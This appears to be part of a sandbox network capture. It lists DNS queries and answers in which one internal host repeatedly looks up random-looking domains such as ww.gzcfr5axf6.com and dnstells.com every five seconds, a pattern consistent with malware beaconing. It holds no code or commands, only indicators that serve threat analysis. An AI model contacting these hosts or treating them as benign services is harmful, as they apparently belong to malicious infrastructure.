Aug 20, 2024 15:34:49.670447111 CEST	46793	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:49.679826975 CEST	53	46793	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:54.684293985 CEST	59596	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:54.701713085 CEST	53	59596	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:54.702004910 CEST	37691	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:34:54.711842060 CEST	53	37691	8.8.4.4	192.168.2.23
Aug 20, 2024 15:34:54.712033987 CEST	55406	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:54.722115993 CEST	53	55406	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:54.722198009 CEST	39096	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:34:54.732453108 CEST	53	39096	8.8.4.4	192.168.2.23
Aug 20, 2024 15:34:54.732559919 CEST	47572	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:54.739579916 CEST	53	47572	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:59.744098902 CEST	51911	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:59.760524035 CEST	53	51911	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:59.760611057 CEST	53553	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:34:59.771076918 CEST	53	53553	8.8.4.4	192.168.2.23
Aug 20, 2024 15:34:59.771183014 CEST	56014	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:59.795047998 CEST	53	56014	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:59.795114040 CEST	35431	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:34:59.813102961 CEST	53	35431	8.8.4.4	192.168.2.23
Aug 20, 2024 15:34:59.813193083 CEST	35664	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:59.819709063 CEST	53	35664	8.8.8.8	192.168.2.23
Aug 20, 2024 15:35:04.824400902 CEST	54928	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:35:04.840450048 CEST	53	54928	8.8.8.8	192.168.2.23
Aug 20, 2024 15:35:04.840712070 CEST	32947	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:35:04.850723982 CEST	53	32947	8.8.4.4	192.168.2.23
Aug 20, 2024 15:35:04.850817919 CEST	60178	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:35:04.865865946 CEST	53	60178	8.8.8.8	192.168.2.23
Aug 20, 2024 15:35:04.865923882 CEST	34143	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:35:04.877391100 CEST	53	34143	8.8.4.4	192.168.2.23
Aug 20, 2024 15:35:04.877650976 CEST	39286	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:35:04.885186911 CEST	53	39286	8.8.8.8	192.168.2.23
Aug 20, 2024 15:35:09.889811039 CEST	50041	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:35:10.913506031 CEST	53	50041	8.8.8.8	192.168.2.23
Aug 20, 2024 15:35:10.913961887 CEST	52908	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:35:10.926918030 CEST	53	52908	8.8.4.4	192.168.2.23
Aug 20, 2024 15:35:10.927124023 CEST	46927	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:35:10.937247992 CEST	53	46927	8.8.8.8	192.168.2.23
Aug 20, 2024 15:35:10.937413931 CEST	41396	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:35:10.947144985 CEST	53	41396	8.8.4.4	192.168.2.23
Aug 20, 2024 15:35:10.947216034 CEST	53980	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:35:10.954763889 CEST	53	53980	8.8.8.8	192.168.2.23
Aug 20, 2024 15:35:15.959306955 CEST	48658	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:35:15.969352961 CEST	53	48658	8.8.8.8	192.168.2.23
Aug 20, 2024 15:35:15.969558001 CEST	57450	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:35:15.978885889 CEST	53	57450	8.8.4.4	192.168.2.23
Aug 20, 2024 15:35:15.979016066 CEST	39677	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:35:15.989343882 CEST	53	39677	8.8.8.8	192.168.2.23
Aug 20, 2024 15:35:15.989461899 CEST	50426	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:35:16.000397921 CEST	53	50426	8.8.4.4	192.168.2.23
Aug 20, 2024 15:35:16.000513077 CEST	46253	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:35:16.008491993 CEST	53	46253	8.8.8.8	192.168.2.23

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 20, 2024 15:33:13.210793972 CEST	192.168.2.23	8.8.8.8	0xca08	Standard query (0)	aaa.dsaj2a.org	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:13.217689037 CEST	192.168.2.23	8.8.8.8	0xa94c	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:13.228327036 CEST	192.168.2.23	8.8.4.4	0x8b88	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:13.238342047 CEST	192.168.2.23	8.8.8.8	0x3a25	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:13.248356104 CEST	192.168.2.23	8.8.4.4	0x1f40	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:13.258529902 CEST	192.168.2.23	8.8.8.8	0x964e	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:18.269777060 CEST	192.168.2.23	8.8.8.8	0xd316	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:18.282352924 CEST	192.168.2.23	8.8.4.4	0x787f	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:18.295258999 CEST	192.168.2.23	8.8.8.8	0x4b24	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:18.322813988 CEST	192.168.2.23	8.8.4.4	0x15a6	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:18.339294910 CEST	192.168.2.23	8.8.8.8	0x5093	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:23.359076977 CEST	192.168.2.23	8.8.8.8	0x39fe	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:23.369920969 CEST	192.168.2.23	8.8.4.4	0xdaeb	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:23.380501032 CEST	192.168.2.23	8.8.8.8	0x87cb	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:23.398422003 CEST	192.168.2.23	8.8.4.4	0xc293	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:23.409346104 CEST	192.168.2.23	8.8.8.8	0x541d	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:28.418709040 CEST	192.168.2.23	8.8.8.8	0x5da7	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:28.436306000 CEST	192.168.2.23	8.8.4.4	0xb232	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:28.457220078 CEST	192.168.2.23	8.8.8.8	0x6777	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:28.469017982 CEST	192.168.2.23	8.8.4.4	0x8c4b	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:28.479439020 CEST	192.168.2.23	8.8.8.8	0xf4ff	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:33.499046087 CEST	192.168.2.23	8.8.8.8	0x2ccb	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:33.527776003 CEST	192.168.2.23	8.8.4.4	0x4a07	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:33.539158106 CEST	192.168.2.23	8.8.8.8	0xae84	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:33.555253983 CEST	192.168.2.23	8.8.4.4	0x51e8	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:33.565215111 CEST	192.168.2.23	8.8.8.8	0x18b0	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:38.576958895 CEST	192.168.2.23	8.8.8.8	0x4328	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:38.587291956 CEST	192.168.2.23	8.8.4.4	0x13da	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:38.603701115 CEST	192.168.2.23	8.8.8.8	0xeaf3	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:38.625533104 CEST	192.168.2.23	8.8.4.4	0xe116	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:38.636653900 CEST	192.168.2.23	8.8.8.8	0xb982	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:43.660666943 CEST	192.168.2.23	8.8.8.8	0xe27c	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:43.670932055 CEST	192.168.2.23	8.8.4.4	0x343c	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:43.686122894 CEST	192.168.2.23	8.8.8.8	0xa012	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:43.695976019 CEST	192.168.2.23	8.8.4.4	0xb55a	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:43.710443974 CEST	192.168.2.23	8.8.8.8	0x9476	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:48.724364996 CEST	192.168.2.23	8.8.8.8	0x2208	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:48.736531973 CEST	192.168.2.23	8.8.4.4	0x7c67	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:48.747051954 CEST	192.168.2.23	8.8.8.8	0x3b04	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:48.758111000 CEST	192.168.2.23	8.8.4.4	0xa6e6	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:48.767684937 CEST	192.168.2.23	8.8.8.8	0xe776	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:53.790005922 CEST	192.168.2.23	8.8.8.8	0xcbd7	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:53.823414087 CEST	192.168.2.23	8.8.4.4	0xf523	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:53.834913015 CEST	192.168.2.23	8.8.8.8	0xbf3	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:53.844167948 CEST	192.168.2.23	8.8.4.4	0x72cd	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:53.860977888 CEST	192.168.2.23	8.8.8.8	0xb17f	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:58.873265028 CEST	192.168.2.23	8.8.8.8	0x4072	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:58.883826017 CEST	192.168.2.23	8.8.4.4	0xb849	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:58.894243956 CEST	192.168.2.23	8.8.8.8	0xfc2f	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:58.903924942 CEST	192.168.2.23	8.8.4.4	0xd75a	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:58.919729948 CEST	192.168.2.23	8.8.8.8	0xc570	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:03.933043957 CEST	192.168.2.23	8.8.8.8	0x13ff	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:03.945491076 CEST	192.168.2.23	8.8.4.4	0x4994	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:03.956357002 CEST	192.168.2.23	8.8.8.8	0x176f	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:03.969943047 CEST	192.168.2.23	8.8.4.4	0xc4b1	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:03.979664087 CEST	192.168.2.23	8.8.8.8	0x5419	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:08.989025116 CEST	192.168.2.23	8.8.8.8	0x5d47	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:09.000530958 CEST	192.168.2.23	8.8.4.4	0x8012	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:09.018616915 CEST	192.168.2.23	8.8.8.8	0x4166	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:09.033441067 CEST	192.168.2.23	8.8.4.4	0xda42	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:09.044358969 CEST	192.168.2.23	8.8.8.8	0x5f3	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:14.056471109 CEST	192.168.2.23	8.8.8.8	0xf2df	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:14.066889048 CEST	192.168.2.23	8.8.4.4	0xa12f	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:14.077756882 CEST	192.168.2.23	8.8.8.8	0xa857	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:14.111737967 CEST	192.168.2.23	8.8.4.4	0xa061	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:14.133826017 CEST	192.168.2.23	8.8.8.8	0x5ae7	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:19.143562078 CEST	192.168.2.23	8.8.8.8	0x61ad	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:19.154174089 CEST	192.168.2.23	8.8.4.4	0xfefb	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:19.164999962 CEST	192.168.2.23	8.8.8.8	0xc0a	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:19.177761078 CEST	192.168.2.23	8.8.4.4	0x28ab	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:19.194645882 CEST	192.168.2.23	8.8.8.8	0x6d51	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:24.222907066 CEST	192.168.2.23	8.8.8.8	0xae18	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:24.233330965 CEST	192.168.2.23	8.8.4.4	0x5df2	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:24.243160009 CEST	192.168.2.23	8.8.8.8	0x1205	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:24.254492044 CEST	192.168.2.23	8.8.4.4	0x8e44	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:24.267229080 CEST	192.168.2.23	8.8.8.8	0x8c52	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:29.278918982 CEST	192.168.2.23	8.8.8.8	0x334e	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:29.291681051 CEST	192.168.2.23	8.8.4.4	0x196a	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:29.314313889 CEST	192.168.2.23	8.8.8.8	0x1bc0	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:29.323755980 CEST	192.168.2.23	8.8.4.4	0x7b7d	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:29.339648008 CEST	192.168.2.23	8.8.8.8	0x2510	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:34.352046013 CEST	192.168.2.23	8.8.8.8	0xfd36	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:34.375931978 CEST	192.168.2.23	8.8.4.4	0xd216	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:34.391191006 CEST	192.168.2.23	8.8.8.8	0x1485	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:34.401849031 CEST	192.168.2.23	8.8.4.4	0x7244	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:34.413964033 CEST	192.168.2.23	8.8.8.8	0x5f9b	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:39.425430059 CEST	192.168.2.23	8.8.8.8	0xf563	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:39.445626020 CEST	192.168.2.23	8.8.4.4	0x8573	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:39.455732107 CEST	192.168.2.23	8.8.8.8	0xbdf2	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:39.493415117 CEST	192.168.2.23	8.8.4.4	0x6565	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:39.511424065 CEST	192.168.2.23	8.8.8.8	0x3b21	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:44.522949934 CEST	192.168.2.23	8.8.8.8	0xccfc	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:44.556514978 CEST	192.168.2.23	8.8.4.4	0x35b6	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:44.572573900 CEST	192.168.2.23	8.8.8.8	0xa23f	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:44.582643032 CEST	192.168.2.23	8.8.4.4	0x4920	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:44.600517035 CEST	192.168.2.23	8.8.8.8	0x7652	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:49.611341953 CEST	192.168.2.23	8.8.8.8	0xf492	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:49.625459909 CEST	192.168.2.23	8.8.4.4	0xffa9	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:49.636002064 CEST	192.168.2.23	8.8.8.8	0xea5b	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:49.659280062 CEST	192.168.2.23	8.8.4.4	0x6d5e	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:49.670447111 CEST	192.168.2.23	8.8.8.8	0xfb51	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:54.684293985 CEST	192.168.2.23	8.8.8.8	0x6d2	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:54.702004910 CEST	192.168.2.23	8.8.4.4	0xc211	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:54.712033987 CEST	192.168.2.23	8.8.8.8	0x640b	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:54.722198009 CEST	192.168.2.23	8.8.4.4	0xf36f	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:54.732559919 CEST	192.168.2.23	8.8.8.8	0xbd37	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:59.744098902 CEST	192.168.2.23	8.8.8.8	0xbf8a	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:59.760611057 CEST	192.168.2.23	8.8.4.4	0x661f	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:59.771183014 CEST	192.168.2.23	8.8.8.8	0x7f5b	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:59.795114040 CEST	192.168.2.23	8.8.4.4	0xb91f	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:34:59.813193083 CEST	192.168.2.23	8.8.8.8	0xba95	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:04.824400902 CEST	192.168.2.23	8.8.8.8	0xd664	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:04.840712070 CEST	192.168.2.23	8.8.4.4	0x3d47	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:04.850817919 CEST	192.168.2.23	8.8.8.8	0xd92b	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:04.865923882 CEST	192.168.2.23	8.8.4.4	0x5fa4	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:04.877650976 CEST	192.168.2.23	8.8.8.8	0xe19e	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:09.889811039 CEST	192.168.2.23	8.8.8.8	0xc41f	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:10.913961887 CEST	192.168.2.23	8.8.4.4	0x7882	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:10.927124023 CEST	192.168.2.23	8.8.8.8	0x657f	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:10.937413931 CEST	192.168.2.23	8.8.4.4	0xe634	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:10.947216034 CEST	192.168.2.23	8.8.8.8	0xd447	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:15.959306955 CEST	192.168.2.23	8.8.8.8	0x7458	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:15.969558001 CEST	192.168.2.23	8.8.4.4	0x3090	Standard query (0)	ww.dnstells.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:15.979016066 CEST	192.168.2.23	8.8.8.8	0x6471	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:15.989461899 CEST	192.168.2.23	8.8.4.4	0xee01	Standard query (0)	ww.gzcfr5axf7.com	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:35:16.000513077 CEST	192.168.2.23	8.8.8.8	0x768	Standard query (0)	ww.gzcfr5axf6.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 20, 2024 15:33:13.222019911 CEST	8.8.8.8	192.168.2.23	0xca08	No error (0)	aaa.dsaj2a.org		23.253.46.64	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:13.228251934 CEST	8.8.8.8	192.168.2.23	0xa94c	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:13.238188982 CEST	8.8.4.4	192.168.2.23	0x8b88	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:13.248281002 CEST	8.8.8.8	192.168.2.23	0x3a25	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:13.258411884 CEST	8.8.4.4	192.168.2.23	0x1f40	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:13.267524958 CEST	8.8.8.8	192.168.2.23	0x964e	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:18.282238007 CEST	8.8.8.8	192.168.2.23	0xd316	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:18.295133114 CEST	8.8.4.4	192.168.2.23	0x787f	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:18.322721004 CEST	8.8.8.8	192.168.2.23	0x4b24	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:18.339209080 CEST	8.8.4.4	192.168.2.23	0x15a6	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:18.354532957 CEST	8.8.8.8	192.168.2.23	0x5093	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:23.369297028 CEST	8.8.8.8	192.168.2.23	0x39fe	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:23.380069971 CEST	8.8.4.4	192.168.2.23	0xdaeb	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:23.397413015 CEST	8.8.8.8	192.168.2.23	0x87cb	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:23.409084082 CEST	8.8.4.4	192.168.2.23	0xc293	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:23.416302919 CEST	8.8.8.8	192.168.2.23	0x541d	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:28.436206102 CEST	8.8.8.8	192.168.2.23	0x5da7	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:28.456479073 CEST	8.8.4.4	192.168.2.23	0xb232	Name error (3)	ww.dnstells.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:28.468933105 CEST	8.8.8.8	192.168.2.23	0x6777	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:28.479259968 CEST	8.8.4.4	192.168.2.23	0x8c4b	Name error (3)	ww.gzcfr5axf7.com	none	none	A (IP address)	IN (0x0001)	false
Aug 20, 2024 15:33:28.499183893 CEST	8.8.8.8	192.168.2.23	0xf4ff	No error (0)	ww.gzcfr5axf6.com		23.235.171.197	A (IP address)	IN (0x0001)	false
